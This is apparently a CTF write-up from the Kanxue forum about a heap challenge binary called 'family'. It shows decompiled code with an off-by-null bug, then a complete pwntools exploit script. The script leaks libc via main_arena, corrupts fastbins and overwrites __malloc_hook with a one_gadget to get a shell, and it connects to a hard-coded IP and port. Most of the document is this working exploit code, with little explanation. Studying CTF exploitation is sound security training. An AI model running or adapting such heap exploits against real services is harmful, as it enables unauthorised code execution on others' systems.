本文为看雪论坛优秀文章
看雪论坛作者ID:F0und
0x00 前置知识
0x10 漏洞分析
void __cdecl read_n(char *buf, size_t len)
{
char ch_0; // [rsp+13h] [rbp-Dh]
int i; // [rsp+14h] [rbp-Ch]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
for ( i = 0; i < len; ++i )
{
ch_0 = 0;
if ( read(0, &ch_0, 1uLL) < 0 )
{
puts("Read error!!\n");
exit(1);
}
buf[i] = ch_0;
if ( ch_0 == 10 )
break;
}
buf[i] = 0; // 固定向后面添加一个'\x00' 字符
}
void __cdecl buildhouse()
{
int size; // [rsp+8h] [rbp-18h]
int i; // [rsp+Ch] [rbp-14h]
char *buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = __readfsqword(0x28u);
buf = 0LL;
for ( i = 0; ; ++i )
{
if ( i > 15 )
{
puts("You can't build a house anymore!");
return;
}
if ( !house[i] )
break;
}
puts("How big a house do you want to build?");
if ( (unsigned int)_isoc99_scanf("%u", &size) == -1 )
exit(-1);
if ( size <= 0 || size > 0x47 ) // fastbin
{
puts("Your house is not the right size");
exit(-1);
}
buf = (char *)malloc(size);
if ( !buf )
{
puts("Something wrong in building !!");
exit(-1);
}
house[i] = buf;
puts("How do you want to decorate your house?");
read_n(house[i], size);
puts("Done,your house is completed!");
}
0x20 漏洞利用
Add(0x18,'start')#0
Add(0x18,'f')#1
Add(0x38,'f')#2
Add(0x28,'f')#3
Add(0x38,'f')#4
Add(0x38,'a'*0x20+p64(0x100)+p64(0x10))#5
Add(0x10,'f')#6
for i in range(1,6):
Delete(i)
sh.sendlineafter('Choice:',"1"*0x400)
Delete(0)
Add(0x18,'a'*0x18)#0
Add(0x18,'a')#1
Add(0x28,'f')#2
Add(0x38,'b')#3
Add(0x38,'c')#4
Add(0x38,'d')#5
Delete(1)
Delete(2)
sh.sendlineafter('Choice:',"1"*0x400)
Delete(6)
sh.sendlineafter('Choice:',"1"*0x400)
Add(0x38,'a')#1
Add(0x18,'b')#2
Add(0x28,'c')#6
main_arena = u64(sh.recvuntil('\x7f').ljust(8,'\x00'))- 88
libc_base = main_arena - 0x3c4b20
free_hook = libc_base + libc.symbols['__free_hook']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['__libc_realloc']
one_gadget = libc_base + 0x4526a
Add(0x28,'a')#7-->3
Add(0x38,'b')#8-->4
Add(0x38,'c')#9
Add(0x28,'d')#10
Add(0x47,p64(0x41))#11
Add(0x47,p64(0x41))#12
Delete(11)
Delete(12)
Add(0x47,p64(0x41))
Delete(3)
Delete(10)
Delete(7)
Add(0x28,p64(0x41)*2)
Add(0x28,'f0und')
Add(0x28,p64(0x41)*2)
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+48)+p64(0)*3+p64(0x41))
Add(0x38,p64(0)*3+p64(malloc_hook-0x18))
#getshell local
Add(0x38,p64(one_gadget_local)+p64(realloc+13))
sh.recvuntil("Choice:")
sh.sendline('1')
sh.recvuntil("How big a house do you want to build?\n")
sh.sendline('2')
0x30 Final Exp
#/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import *
proc="./family"
elf=ELF(proc)
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.log_level="debug"
def Add(des_size,des):
sh.recvuntil("Choice:")
sh.sendline(str(1))
sh.recvuntil("How big a house do you want to build?\n")
sh.sendline(str(des_size))
sh.recvuntil("How do you want to decorate your house?\n")
sh.sendline(des)
def Delete(index):
sh.recvuntil("Choice:")
sh.sendline(str(2))
sh.recvuntil("Which house do you want to remove?\n")
sh.sendline(str(index))
def Show(index):
sh.recvuntil("Choice:")
sh.sendline(str(3))
sh.recvuntil("Which house do you want to view?\n")
sh.sendline(str(index))
def pwn(ip,port,debug):
global sh
if debug==1:
context.log_level="debug"
sh=process(proc)
else:
sh=remote(ip,port)
Add(0x18,'start')#0
Add(0x18,'f')#1
Add(0x38,'f')#2
Add(0x28,'f')#3
Add(0x38,'f')#4
Add(0x38,p64(8)*4+p64(0x100)+p64(0x10))#5
Add(0x10,'f')#6
for i in range(1,6):
Delete(i)
sh.sendlineafter('Choice:',"1"*0x400)
Delete(0)
Add(0x18,'a'*0x18)#0
Add(0x18,'a')#1
Add(0x38,'f')#2
Add(0x28,'b')#3
Add(0x38,'c')#4
Add(0x38,'d')#5
Delete(1)
Delete(2)
sh.sendlineafter('Choice:',"1"*0x400)
Delete(6)
sh.sendlineafter('Choice:',"1"*0x400)
Add(0x38,'a')#1
Add(0x18,'b')#2
Add(0x28,'c')#6
Show(3)
main_arena = u64(sh.recvuntil('\x7f').ljust(8,'\x00'))- 88
libc_base = main_arena - 0x3c4b20
free_hook = libc_base + libc.symbols['__free_hook']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['__libc_realloc']
one_gadget = libc_base + 0x4526a
one_gadget_local = libc_base + 0x4527a
log.info("libc_base: "+hex(libc_base))
log.info("main_arena: "+hex(main_arena))
log.info("free_hook: "+hex(free_hook))
log.info("malloc_hook: "+hex(malloc_hook))
Add(0x28,'a')#7-->3
Add(0x38,'b')#8-->4
Add(0x38,'c')#9
Add(0x28,'d')#10
Add(0x47,p64(0x41))#11
Add(0x47,p64(0x41))#12
Delete(11)
Delete(12)
Add(0x47,p64(0x41))
Delete(3)
Delete(10)
Delete(7)
Add(0x28,p64(0x41)*2)
Add(0x28,'f0und')
Add(0x28,p64(0x41)*2)
Delete(8)
Delete(9)
Delete(4)
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+8))
Add(0x38,p64(main_arena+48)+p64(0)*3+p64(0x41))
Add(0x38,p64(0)*3+p64(malloc_hook-0x18))
#Add(0x38,p64(one_gadget)*2+p64(realloc+13))
#getshell local
Add(0x38,p64(one_gadget_local)+p64(realloc+13))
sh.recvuntil("Choice:")
sh.sendline('1')
sh.recvuntil("How big a house do you want to build?\n")
sh.sendline('2')
sh.interactive()
if __name__ =="__main__":
pwn("111.231.70.44",28006,1)
看雪ID:F0und
https://bbs.pediy.com/user-home-923114.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!